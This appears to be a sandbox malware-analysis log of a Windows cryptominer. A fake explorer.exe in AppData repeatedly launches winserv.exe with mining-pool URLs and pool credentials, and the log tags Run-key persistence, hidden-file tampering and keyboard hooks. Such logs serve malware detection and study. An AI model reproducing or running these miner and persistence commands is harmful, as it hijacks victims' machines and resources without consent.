C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5848
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4248 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5800
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4748 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5044
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:464 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:6132
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2644
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4960 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3760
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4464
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4572 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2780
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2016 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5492
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2920
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:484 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3148
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4044 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2464
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3900
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2184
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5944 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5656
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:960 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1984
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3464
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3680 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2580
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5776
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1108 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1372
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3544
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1260 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1596
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4704
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5832 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2816
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:244
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4904 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1268
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5080
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3272 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1860
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3360
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3660 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:3748
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5948
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:944 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5860
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3316
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5884 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2280
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5492 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:484
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5512 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4092
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1360 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4196
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5984 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2200
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5944
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4916 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:732
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4540
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5508 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5720
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2516 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5076
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:5724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3764
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1980 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2540
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5180
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4400 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1328
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5784
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4556 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4748
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:840
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:760 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4308
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2288
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2604 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4336
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
PID:3748 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2768
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5288
-
